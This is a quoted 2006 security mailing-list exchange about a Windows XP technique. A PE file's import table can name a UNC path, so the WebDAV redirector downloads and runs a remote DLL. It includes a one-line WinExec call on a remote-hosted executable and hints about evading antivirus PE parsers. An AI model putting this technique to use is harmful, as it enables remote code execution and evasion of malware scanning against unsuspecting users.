>
> ------------------------------
>
> Message: 2
> Date: Tue, 7 Nov 2006 02:59:10 -0800
> From: Solar Eclipse <solareclipse@xxxxxxxxxxxx>
> Subject: [Dailydave] UNC imports in PE files
> To: dailydave@xxxxxxxxxxxxxxxxxxxxx
> Message-ID:
> <20061107105910.GA19579@xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx>
> Content-Type: text/plain; charset="us-ascii"
>
> Hello list,
>
> Most of you probably know that the WebDAV redirector in
> Windows XP tries to
> resolve UNC paths from all applications with WebDAV requests
> on port 80. This
> means that instead of calling
> URLDownloadToFile(";)
> and then WinExec, you can do just WinExec("\\192.168.0.1\foo.exe")
>
> What you probably don't know is that you can use a full UNC
> path instead of a
> DLL name in the import section of a PE file. When the file is
> executed, the
> loader will try to access the imported DLL using the UNC path
> and the WebDAV
> redirector will download the DLL from the Internet.
>
> It is getting increasingly harder to draw (and defend) the
> boundaries between
> the local machine, the local network and the the Internet.
>
> Check out for the
> source code of a
> 137 byte PE file that downloads a DLL over WebDAV and
> executes the payload in
> its DllMain function. The PE file doesn't even have to
> contain any code,
> because DllMain is executed before the entry point of the executable.
>
> The page also has detailed information about hacking the PE
> header and building
> the smallest possible PE file that can be executed on
> Windows. Its size is only
> 97 bytes.
>
> If anybody is really bored, feel free to check how many
> anti-virus products
> have PE parsers that don't handle the header of the 97 byte
> PE file properly
> and fail to unpack and scan the code in the file.
>
>
> Good night and good luck,
> Solar Eclipse
> -------------- next part --------------
> A non-text attachment was scrubbed...
> Name: not available
> Type: application/pgp-signature
> Size: 186 bytes
> Desc: not available
> Url :
>
> 0061107/f3e7c53e/attachment-0001.pgp
>
> ------------------------------
>
>
> ------------------------------
>
> Message: 7
> Date: Wed, 8 Nov 2006 13:57:16 +0000
> From: Barrie Dempster <barrie@xxxxxxxxxxxxxxxx>
> Subject: Re: [Dailydave] UNC imports in PE files
> To: dailydave@xxxxxxxxxxxxxxxxxxxxx
> Message-ID: <200611081357.35854.barrie@xxxxxxxxxxxxxxxx>
> Content-Type: text/plain; charset="iso-8859-15"
>
> On Tuesday 07 November 2006 10:59, Solar Eclipse wrote:
> <snip>
> > What you probably don't know is that you can use a full UNC
> path instead of
> > a DLL name in the import section of a PE file. When the
> file is executed,
> > the loader will try to access the imported DLL using the
> UNC path and the
> > WebDAV redirector will download the DLL from the Internet.
>
>
> Whilst using this technique to decrease PE size is quite
> interesting, I'd be
> willing to bet most here would already be aware of the redirector
> functionality when loading DLLs, as it was pointed out by
> Dave Litchfield
> over a year ago.
>
> www.ngssoftware.com/papers/xpms.pdf
>
> --
> With Regards..
> Barrie Dempster (zeedo) - Fortiter et Strenue
>
> - -
>
> "He who hingeth aboot, geteth hee-haw" Victor - Still Game
